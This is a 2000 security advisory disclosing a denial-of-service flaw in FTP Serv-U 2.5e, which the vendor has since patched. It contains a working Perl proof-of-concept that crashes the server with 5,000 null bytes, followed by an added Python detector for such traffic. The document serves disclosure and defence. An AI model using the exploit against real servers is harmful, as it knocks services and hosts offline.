=================================================================
Blue Panda Vulnerability Announcement: FTP Serv-U 2.5e
04/08/2000 (dd/mm/yyyy)

bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================

Problem:
Sending FTP Serv-U a string containing a large number of null bytes will
cause it to stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. A valid user/pass combination
is not required to take advantage of this vulnerability.

Vulnerable:
FTP Serv-U 2.5e, possibly prior versions (untested).

Immune:
FTP Serv-U 2.5f.

Vendor status:
Notified. A fix has been released.

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

$counter = 0;
$buf = "";
while ($counter < 5000) {
    $buf .= "\x00";
    $counter += 1;
}

print $socket "$buf\n";
sleep(4);
close($socket);
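
Added example (not part of the original advisory or the author's code): a detection check for the condition described under "Problem", flagging client-to-server FTP control-channel lines that carry many null bytes and noting whether they arrived before any PASS command. The function name, the threshold of 8 and the sample streams are assumptions constructed for illustration.

```python
# Added example: flag FTP control-channel lines that carry many NUL bytes.
# MAX_NULS and the sample streams below are constructed, not from the advisory.
import re

MAX_NULS = 8  # assumed threshold; tune for the environment being monitored
NUL_RUN = re.compile(rb"\x00+")


def inspect_control_stream(data: bytes, max_nuls: int = MAX_NULS):
    """Return one finding per client-to-server line exceeding max_nuls NULs.

    'pre_auth' means no PASS command was seen earlier in this stream; it is
    a proxy only, since client bytes alone cannot confirm a successful login.
    """
    findings = []
    pass_seen = False
    for idx, line in enumerate(data.split(b"\n")):
        line = line.rstrip(b"\r")
        # Telnet NVT allows NUL directly after a bare CR; drop that pair so
        # the legitimate encoding is not counted.
        stripped = line.replace(b"\r\x00", b"\r")
        nul_count = stripped.count(b"\x00")
        if nul_count > max_nuls:
            longest = max(len(m.group()) for m in NUL_RUN.finditer(stripped))
            findings.append({
                "line": idx,
                "nul_count": nul_count,
                "longest_run": longest,
                "pre_auth": not pass_seen,
            })
        verb = stripped.lstrip(b"\x00").split(b" ", 1)[0].upper()
        if verb == b"PASS":
            pass_seen = True
    return findings


# Constructed sample streams (not captured traffic).
BENIGN = b"USER anonymous\r\nPASS guest@example.org\r\nLIST\r\nQUIT\r\n"
SUSPECT = b"\x00" * 5000 + b"\n"   # same shape as the string in the advisory
LATE = b"USER bob\r\nPASS secret\r\n" + b"\x00" * 100 + b"\r\n"

if __name__ == "__main__":
    for name, stream in (("benign", BENIGN), ("suspect", SUSPECT), ("late", LATE)):
        print(name, inspect_control_stream(stream))
```

Feed it the reassembled client side of a port 21 session; a finding with pre_auth set corresponds to the unauthenticated case the advisory describes.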